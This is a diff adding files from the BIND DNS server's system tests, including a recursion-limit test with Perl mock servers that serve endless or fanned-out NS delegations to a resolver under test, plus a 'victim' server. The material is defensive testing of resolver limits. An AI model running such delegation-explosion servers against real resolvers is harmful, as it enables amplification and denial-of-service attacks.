$ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "sleep 2, allow entries in cache to go stale" +sleep 2 + +n=$((n+1)) +echo_i "query for .stale is not minimized when qname-minimization is off (stale cache) ($n)" +ret=0 +$CLEANQL +$DIG $DIGOPTS @10.53.0.5 txt a.b.stale. > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "a\.b\.stale\..*1.*IN.*TXT.*peekaboo" dig.out.test$n > /dev/null || ret=1 +sleep 1 +echo "TXT a.b.stale." | $DIFF ans2/query.log - > /dev/null || ret=1 +echo "TXT a.b.stale." | $DIFF ans3/query.log - > /dev/null || ret=1 +test -f ans4/query.log && ret=1 +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .stale is properly minimized when qname-minimization is in strict mode (stale cache) ($n)" +ret=0 +$CLEANQL +$DIG $DIGOPTS @10.53.0.6 txt a.b.stale. > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "a\.b\.stale\..*1.*IN.*TXT.*hooray" dig.out.test$n > /dev/null || ret=1 +sleep 1 +sort ans2/query.log > ans2/query.log.sorted +cat << __EOF | $DIFF ans2/query.log.sorted - > /dev/null || ret=1 +NS b.stale. +NS stale. +__EOF +test -f ans3/query.log && ret=1 +sort ans4/query.log > ans4/query.log.sorted +cat << __EOF | $DIFF ans4/query.log.sorted - > /dev/null || ret=1 +NS b.stale. +TXT a.b.stale. +__EOF +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .stale is properly minimized when qname-minimization is in relaxed mode (stale cache) ($n)" +ret=0 +$CLEANQL +$DIG $DIGOPTS @10.53.0.7 txt a.b.stale. > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "a\.b\.stale\..*1.*IN.*TXT.*hooray" dig.out.test$n > /dev/null || ret=1 +sleep 1 +sort ans2/query.log > ans2/query.log.sorted +cat << __EOF | $DIFF ans2/query.log.sorted - > /dev/null || ret=1 +ADDR _.b.stale. +__EOF +test -f ans3/query.log && ret=1 +sort ans4/query.log > ans4/query.log.sorted +cat << __EOF | $DIFF ans4/query.log.sorted - > /dev/null || ret=1 +TXT a.b.stale. +__EOF +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/reclimit/README b/bin/tests/system/reclimit/README new file mode 100644 index 0000000..e474907 --- /dev/null +++ b/bin/tests/system/reclimit/README @@ -0,0 +1,19 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +system test for recursion limits + +ns1 -- root server +ans2 -- for example.org: delegate to ns1.(n+1).example.org for all n, up to the + value specified in ans.limit (or forever if limit is 0) +ns3 -- resolver under test +ans4 -- for ns*.example.com: return address records. +ans7 -- "victim" server diff --git a/bin/tests/system/reclimit/ans2/ans.pl b/bin/tests/system/reclimit/ans2/ans.pl new file mode 100644 index 0000000..4576951 --- /dev/null +++ b/bin/tests/system/reclimit/ans2/ans.pl @@ -0,0 +1,235 @@ +#!/usr/bin/env perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +use strict; +use warnings; + +use IO::File; +use IO::Socket; +use Net::DNS; + +my $localaddr = "10.53.0.2"; +my $limit = getlimit(); +my $no_more_waiting = 0; +my @delayed_response; +my $timeout; + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } + +my $udpsock = IO::Socket::INET->new(LocalAddr => "$localaddr", + LocalPort => $localport, Proto => "udp", Reuse => 1) or die "$!"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!"; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +my $count = 0; +my $send_response = 0; + +sub getlimit { + if ( -e "ans.limit") { + open(FH, "<", "ans.limit"); + my $line = <FH>; + chomp $line; + close FH; + if ($line =~ /^\d+$/) { + return $line; + } + } + + return 0; +} + +# If $wait == 0 is returned, returned reply will be sent immediately. +# If $wait == 1 is returned, sending the returned reply might be delayed; see +# comments inside handle_UDP() for details. +sub reply_handler { + my ($qname, $qclass, $qtype) = @_; + my ($rcode, @ans, @auth, @add, $wait); + + print ("request: $qname/$qtype\n"); + STDOUT->flush(); + + $wait = 0; + $count += 1; + + if ($qname eq "count" ) { + if ($qtype eq "TXT") { + my ($ttl, $rdata) = (0, "$count"); + my $rr = new Net::DNS::RR("$qname $ttl $qclass $qtype $rdata"); + push @ans, $rr; + print ("\tcount: $count\n"); + } + $rcode = "NOERROR"; + } elsif ($qname eq "reset" ) { + $count = 0; + $send_response = 0; + $limit = getlimit(); + $rcode = "NOERROR"; + print ("\tlimit: $limit\n"); + } elsif ($qname eq "direct.example.org" ) { + if ($qtype eq "A") { + my ($ttl, $rdata) = (3600, $localaddr); + my $rr = new Net::DNS::RR("$qname $ttl $qclass $qtype $rdata"); + push @ans, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "indirect1.example.org" || + $qname eq "indirect2.example.org" || + $qname eq "indirect3.example.org" || + $qname eq "indirect4.example.org" || + $qname eq "indirect5.example.org" || + $qname eq "indirect6.example.org" || + $qname eq "indirect7.example.org" || + $qname eq "indirect8.example.org") { + if (! $send_response) { + my $rr = new Net::DNS::RR("$qname 86400 $qclass NS ns1.1.example.org"); + push @auth, $rr; + } elsif ($qtype eq "A") { + my ($ttl, $rdata) = (3600, $localaddr); + my $rr = new Net::DNS::RR("$qname $ttl $qclass $qtype $rdata"); + push @ans, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname =~ /^ns1\.(\d+)\.example\.org$/) { + my $next = $1 + 1; + $wait = 1; + if ($limit == 0 || (! $send_response && $next <= $limit)) { + my $rr = new Net::DNS::RR("$1.example.org 86400 $qclass NS ns1.$next.example.org"); + push @auth, $rr; + } else { + $send_response = 1; + if ($qtype eq "A") { + my ($ttl, $rdata) = (3600, "10.53.0.4"); + my $rr = new Net::DNS::RR("$qname $ttl $qclass $qtype $rdata"); + print("\tresponse: $qname $ttl $qclass $qtype $rdata\n"); + push @ans, $rr; + } + } + $rcode = "NOERROR"; + } elsif ($qname eq "direct.example.net" ) { + if ($qtype eq "A") { + my ($ttl, $rdata) = (3600, $localaddr); + my $rr = new Net::DNS::RR("$qname $ttl $qclass $qtype $rdata"); + push @ans, $rr; + } + $rcode = "NOERROR"; + } elsif( $qname =~ /^ns1\.(\d+)\.example\.net$/ ) { + my $next = ($1 + 1) * 16; + for (my $i = 1; $i < 16; $i++) { + my $s = $next + $i; + my $rr = new Net::DNS::RR("$1.example.net 86400 $qclass NS ns1.$s.example.net"); + push @auth, $rr; + $rr = new Net::DNS::RR("ns1.$s.example.net 86400 $qclass A 10.53.0.7"); + push @add, $rr; + } + $rcode = "NOERROR"; + } else { + $rcode = "NXDOMAIN"; + } + + return ($rcode, \@ans, \@auth, \@add, $wait); +} + +sub handleUDP { + my ($buf, $peer) = @_; + my ($request, $rcode, $ans, $auth, $add, $wait); + + $request = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + + my ($question) = $request->question; + my $qname = $question->qname; + my $qclass = $question->qclass; + my $qtype = $question->qtype; + + ($rcode, $ans, $auth, $add, $wait) = reply_handler($qname, $qclass, $qtype); + + my $reply = $request->reply(); + + $reply->header->rcode($rcode); + $reply->header->aa(@$ans ? 1 : 0); + $reply->header->id($request->header->id); + $reply->{answer} = $ans if $ans; + $reply->{authority} = $auth if $auth; + $reply->{additional} = $add if $add; + + if ($wait) { + # reply_handler() asked us to delay sending this reply until + # another reply with $wait == 1 is generated or a timeout + # occurs. + if (@delayed_response) { + # A delayed reply is already queued, so we can now send + # both the delayed reply and the current reply. + send_delayed_response(); + return $reply; + } elsif ($no_more_waiting) { + # It was determined before that there is no point in + # waiting for "accompanying" queries. Thus, send the + # current reply immediately. + return $reply; + } else { + # No delayed reply is queued and the client is expected + # to send an "accompanying" query shortly. Do not send + # the current reply right now, just save it for later + # and wait for an "accompanying" query to be received. + @delayed_response = ($reply, $peer); + $timeout = 0.5; + return; + } + } else { + # Send reply immediately. + return $reply; + } +} + +sub send_delayed_response { + my ($reply, $peer) = @delayed_response; + # Truncation to 512 bytes is required for triggering "NS explosion" on + # builds without IPv6 support + $udpsock->send($reply->data(512), 0, $peer); + undef @delayed_response; + undef $timeout; +} + +# Main +my $rin; +my $rout; +for (;;) { + $rin = ''; + vec($rin, fileno($udpsock), 1) = 1; + + select($rout = $rin, undef, undef, $timeout); + + if (vec($rout, fileno($udpsock), 1)) { + my ($buf, $peer, $reply); + $udpsock->recv($buf, 512); + $peer = $udpsock->peername(); + $reply = handleUDP($buf, $peer); + # Truncation to 512 bytes is required for triggering "NS + # explosion" on builds without IPv6 support + $udpsock->send($reply->data(512), 0, $peer) if $reply; + } else { + # An "accompanying" query was expected to come in, but did not. + # Assume the client never sends "accompanying" queries to + # prevent pointlessly waiting for them ever again. + $no_more_waiting = 1; + # Send the delayed reply to the query which caused us to wait. + send_delayed_response(); + } +} diff --git a/bin/tests/system/reclimit/ans4/ans.pl b/bin/tests/system/reclimit/ans4/ans.pl new file mode 100644 index 0000000..d5002aa --- /dev/null +++ b/bin/tests/system/reclimit/ans4/ans.pl @@ -0,0 +1,240 @@ +#!/usr/bin/env perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +use strict; +use warnings; + +use IO::File; +use IO::Socket; +use Net::DNS; + +my $localaddr = "10.53.0.4"; +my $limit = getlimit(); +my $no_more_waiting = 0; +my @delayed_response; +my $timeout; + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } + +my $udpsock = IO::Socket::INET->new(LocalAddr => "$localaddr", + LocalPort => $localport, Proto => "udp", Reuse => 1) or die "$!"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!"; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +my $count = 0; +my $send_response = 1; + +sub getlimit { + if ( -e "ans.limit") { + open(FH, "<", "ans.limit"); + my $line = <FH>; + chomp $line; + close FH; + if ($line =~ /^\d+$/) { + return $line; + } + } + + return 0; +} + +# If $wait == 0 is returned, returned reply will be sent immediately. +# If $wait == 1 is returned, sending the returned reply might be delayed; see +# comments inside handle_UDP() for details. +sub reply_handler { + my ($qname, $qclass, $qtype) = @_; + my ($rcode, @ans, @auth, @add, $wait); + + print ("request: $qname/$qtype\n"); + STDOUT->flush(); + + $wait = 0; + $count += 1; + + if ($qname eq "count" ) { + if ($qtype eq "TXT") { + my ($ttl, $rdata) = (0, "$count"); + my $rr = new Net::DNS::RR("$qname $ttl $qclass $qtype $rdata"); + push @ans, $rr; + print ("\tcount: $count\n"); + } + $rcode = "NOERROR"; + } elsif ($qname eq "reset" ) { + $count = 0; + $send_response = 1; + $limit = getlimit(); + $rcode = "NOERROR"; + print ("\tlimit: $limit\n"); + } elsif ($qname eq "direct.example.org" ) { + if ($qtype eq "A") { + my ($ttl, $rdata) = (3600, $localaddr); + my $rr = new Net::DNS::RR("$qname $ttl $qclass $qtype $rdata"); + push @ans, $rr; + print ("\twait=$wait ans: $qname $ttl $qclass $qtype $rdata\n"); + } + $rcode = "NOERROR"; + } elsif ($qname eq "indirect1.example.org" || + $qname eq "indirect2.example.org" || + $qname eq "indirect3.example.org" || + $qname eq "indirect4.example.org" || + $qname eq "indirect5.example.org" || + $qname eq "indirect6.example.org" || + $qname eq "indirect7.example.org" || + $qname eq "indirect8.example.org") { + if ($qtype eq "A") { + my ($ttl, $rdata) = (3600, $localaddr); + my $rr = new Net::DNS::RR("$qname $ttl $qclass $qtype $rdata"); + push @ans, $rr; + print ("\twait=$wait ans: $qname $ttl $qclass $qtype $rdata\n"); + } + $rcode = "NOERROR"; + } elsif ($qname =~ /^ns1\.(\d+)\.example\.org$/) { + my $next = $1 + 1; + $wait = 1; + if ($limit == 0) { + my $rr = new Net::DNS::RR("$1.example.org 86400 $qclass NS ns1.$next.example.org"); + push @auth, $rr; + print ("\twait=$wait auth: $1.example.org 86400 $qclass NS ns1.$next.example.org\n"); + } else { + $send_response = 1; + if ($qtype eq "A") { + my ($ttl, $rdata) = (3600, $localaddr); + my $rr = new Net::DNS::RR("$qname $ttl $qclass $qtype $rdata"); + print("\tresponse: $qname $ttl $qclass $qtype $rdata\n"); + push @ans, $rr; + } + } + $rcode = "NOERROR"; + } elsif ($qname eq "direct.example.net" ) { + if ($qtype eq "A") { + my ($ttl, $rdata) = (3600, $localaddr); + my $rr = new Net::DNS::RR("$qname $ttl $qclass $qtype $rdata"); + push @ans, $rr; + print ("\twait=$wait ans: $qname $ttl $qclass $qtype $rdata\n"); + } + $rcode = "NOERROR"; + } elsif( $qname =~ /^ns1\.(\d+)\.example\.net$/ ) { + my $next = ($1 + 1) * 16; + for (my $i = 1; $i < 16; $i++) { + my $s = $next + $i; + my $rr = new Net::DNS::RR("$1.example.net 86400 $qclass NS ns1.$s.example.net"); + push @auth, $rr; + print ("\twait=$wait auth: $1.example.net 86400 $qclass NS ns1.$s.example.net\n"); + $rr = new Net::DNS::RR("ns1.$s.example.net 86400 $qclass A 10.53.0.7"); + print ("\twait=$wait add: ns1.$s.example.net 86400 $qclass A 10.53.0.7\n"); + push @add, $rr; + } + $rcode = "NOERROR"; + } else { + $rcode = "NXDOMAIN"; + print ("\twait=$wait NXDOMAIN\n"); + } + + return ($rcode, \@ans, \@auth, \@add, $wait); +} + +sub handleUDP { + my ($buf, $peer) = @_; + my ($request, $rcode, $ans, $auth, $add, $wait); + + $request = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + + my ($question) = $request->question; + my $qname = $question->qname; + my $qclass = $question->qclass; + my $qtype = $question->qtype; + + ($rcode, $ans, $auth, $add, $wait) = reply_handler($qname, $qclass, $qtype); + + my $reply = $request->reply(); + + $reply->header->rcode($rcode); + $reply->header->aa(@$ans ? 1 : 0); + $reply->header->id($request->header->id); + $reply->{answer} = $ans if $ans; + $reply->{authority} = $auth if $auth; + $reply->{additional} = $add if $add; + + if ($wait) { + # reply_handler() asked us to delay sending this reply until + # another reply with $wait == 1 is generated or a timeout + # occurs. + if (@delayed_response) { + # A delayed reply is already queued, so we can now send + # both the delayed reply and the current reply. + send_delayed_response(); + return $reply; + } elsif ($no_more_waiting) { + # It was determined before that there is no point in + # waiting for "accompanying" queries. Thus, send the + # current reply immediately. + return $reply; + } else { + # No delayed reply is queued and the client is expected + # to send an "accompanying" query shortly. Do not send + # the current reply right now, just save it for later + # and wait for an "accompanying" query to be received. + @delayed_response = ($reply, $peer); + $timeout = 0.5; + return; + } + } else { + # Send reply immediately. + return $reply; + } +} + +sub send_delayed_response { + my ($reply, $peer) = @delayed_response; + # Truncation to 512 bytes is required for triggering "NS explosion" on + # builds without IPv6 support + $udpsock->send($reply->data(512), 0, $peer); + undef @delayed_response; + undef $timeout; + print ("send_delayed_response\n"); +} + +# Main +my $rin; +my $rout; +for (;;) { + $rin = ''; + vec($rin, fileno($udpsock), 1) = 1; + + select($rout = $rin, undef, undef, $timeout); + + if (vec($rout, fileno($udpsock), 1)) { + my ($buf, $peer, $reply); + $udpsock->recv($buf, 512); + $peer = $udpsock->peername(); + $reply = handleUDP($buf, $peer); + # Truncation to 512 bytes is required for triggering "NS + # explosion" on builds without IPv6 support + $udpsock->send($reply->data(512), 0, $peer) if $reply; + } else { + # An "accompanying" query was expected to come in, but did not. + # Assume the client never sends "accompanying" queries to + # prevent pointlessly waiting for them ever again. + $no_more_waiting = 1; + # Send the delayed reply to the query which caused us to wait. + send_delayed_response(); + } +} diff --git a/bin/tests/system/reclimit/ans7/ans.pl b/bin/tests/system/reclimit/ans7/ans.pl new file mode 100644 index 0000000..41a44a6 --- /dev/null +++ b/bin/tests/system/reclimit/ans7/ans.pl @@ -0,0 +1,76 @@ +#!/usr/bin/env perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +use strict; +use warnings; + +use IO::File; +use Getopt::Long; +use Net::DNS::Nameserver; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!"; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +my $count = 0; + +my $localaddr = "10.53.0.7"; +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } +my $verbose = 0; + +sub reply_handler { + my ($qname, $qclass, $qtype, $peerhost, $query, $conn) = @_; + my ($rcode, @ans, @auth, @add); + + print ("request: $qname/$qtype\n"); + STDOUT->flush(); + + $count += 1; + + if ($qname eq "count" ) { + if ($qtype eq "TXT") { + my ($ttl, $rdata) = (0, "$count"); + my $rr = new Net::DNS::RR("$qname $ttl $qclass $qtype $rdata"); + push @ans, $rr; + print ("\tcount: $count\n"); + } + $rcode = "NOERROR"; + } elsif ($qname eq "reset") { + $count = 0; + $rcode = "NOERROR"; + } else { + $rcode = "REFUSED"; + } + + # mark the answer as authoritative (by setting the 'aa' flag + return ($rcode, \@ans, \@auth, \@add, { aa => 1 }); +} + +GetOptions( + 'port=i' => \$localport, + 'verbose!' => \$verbose, +); + +my $ns = Net::DNS::Nameserver->new( + LocalAddr => $localaddr, + LocalPort => $localport, + ReplyHandler => \&reply_handler, + Verbose => $verbose, +); + +$ns->main_loop; diff --git a/bin/tests/system/reclimit/clean.sh b/bin/tests/system/reclimit/clean.sh new file mode 100644 index 0000000..0a92f90 --- /dev/null +++ b/bin/tests/system/reclimit/clean.sh @@ -0,0 +1,22 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f dig.out* +rm -f ans?/ans.run +rm -f ans2/ans.limit +rm -f ans4/ans.limit +rm -f ns?/named.memstats +rm -f ns?/named.run +rm -f ns*/named.conf +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/reclimit/ns1/named.conf.in b/bin/tests/system/reclimit/ns1/named.conf.in new file mode 100644 index 0000000..63cb706 --- /dev/null +++ b/bin/tests/system/reclimit/ns1/named.conf.in @@ -0,0 +1,27 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + directory "."; + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; +}; + +zone "." { type primary; file "root.db"; }; diff --git a/bin/tests/system/reclimit/ns1/root.db b/bin/tests/system/reclimit/ns1/root.db new file mode 100644 index 0000000..412715c --- /dev/null +++ b/bin/tests/system/reclimit/ns1/root.db @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. 60 IN SOA ns.nil. hostmaster.ns.nil. 1 0 0 0 0 +. 60 IN NS ns.nil. +ns.nil. 60 IN A 10.53.0.1 +ns.tld1. 60 IN A 10.53.0.1 +example.org. 60 IN NS direct.example.org. +direct.example.org. 60 IN A 10.53.0.2 +example.net. 60 IN NS direct.example.net. +direct.example.net. 60 IN A 10.53.0.2 +example.com. 60 IN NS direct.example.com. +direct.example.com. 60 IN A 10.53.0.4 diff --git a/bin/tests/system/reclimit/ns3/hints.db b/bin/tests/system/reclimit/ns3/hints.db new file mode 100644 index 0000000..c9264bf --- /dev/null +++ b/bin/tests/system/reclimit/ns3/hints.db @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. 60 IN NS ns.nil. +ns.nil. 60 IN A 10.53.0.1 diff --git a/bin/tests/system/reclimit/ns3/named1.conf.in b/bin/tests/system/reclimit/ns3/named1.conf.in new file mode 100644 index 0000000..3eaaf6a --- /dev/null +++ b/bin/tests/system/reclimit/ns3/named1.conf.in @@ -0,0 +1,39 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + directory "."; + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + servfail-ttl 0; + qname-minimization disabled; + max-recursion-depth 12; + recursion yes; + dnssec-validation yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { type hint; file "hints.db"; }; diff --git a/bin/tests/system/reclimit/ns3/named2.conf.in b/bin/tests/system/reclimit/ns3/named2.conf.in new file mode 100644 index 0000000..12bf35f --- /dev/null +++ b/bin/tests/system/reclimit/ns3/named2.conf.in @@ -0,0 +1,39 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + directory "."; + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + servfail-ttl 0; + qname-minimization disabled; + max-recursion-depth 5; + recursion yes; + dnssec-validation yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { type hint; file "hints.db"; }; diff --git a/bin/tests/system/reclimit/ns3/named3.conf.in b/bin/tests/system/reclimit/ns3/named3.conf.in new file mode 100644 index 0000000..0910f94 --- /dev/null +++ b/bin/tests/system/reclimit/ns3/named3.conf.in @@ -0,0 +1,40 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + directory "."; + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + servfail-ttl 0; + qname-minimization disabled; + max-recursion-depth 100; + max-recursion-queries 50; + recursion yes; + dnssec-validation yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { type hint; file "hints.db"; }; diff --git a/bin/tests/system/reclimit/ns3/named4.conf.in b/bin/tests/system/reclimit/ns3/named4.conf.in new file mode 100644 index 0000000..84b5f4b --- /dev/null +++ b/bin/tests/system/reclimit/ns3/named4.conf.in @@ -0,0 +1,40 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + directory "."; + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + servfail-ttl 0; + qname-minimization disabled; + max-recursion-depth 100; + max-recursion-queries 40; + recursion yes; + dnssec-validation yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { type hint; file "hints.db"; }; diff --git a/bin/tests/system/reclimit/prereq.sh b/bin/tests/system/reclimit/prereq.sh new file mode 100644 index 0000000..8c587c3 --- /dev/null +++ b/bin/tests/system/reclimit/prereq.sh @@ -0,0 +1,37 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if $PERL -e 'use Net::DNS;' 2>/dev/null +then + if $PERL -e 'use Net::DNS; die if ($Net::DNS::VERSION <= 0.78);' 2>/dev/null + then + : + else + echo_i "Net::DNS versions up to 0.78 have a bug that causes this test to fail: please update." >&2 + exit 1 + fi +else + echo_i "This test requires the Net::DNS library." >&2 + exit 1 +fi + +if $PERL -e 'use Net::DNS::Nameserver;' 2>/dev/null +then + : +else + echo_i "This test requires the Net::DNS::Nameserver library." >&2 + exit 1 +fi diff --git a/bin/tests/system/reclimit/setup.sh b/bin/tests/system/reclimit/setup.sh new file mode 100644 index 0000000..5b39cdf --- /dev/null +++ b/bin/tests/system/reclimit/setup.sh @@ -0,0 +1,18 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns3/named1.conf.in ns3/named.conf diff --git a/bin/tests/system/reclimit/tests.sh b/bin/tests/system/reclimit/tests.sh new file mode 100644 index 0000000..7fe8ee9 --- /dev/null +++ b/bin/tests/system/reclimit/tests.sh @@ -0,0 +1,211 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + 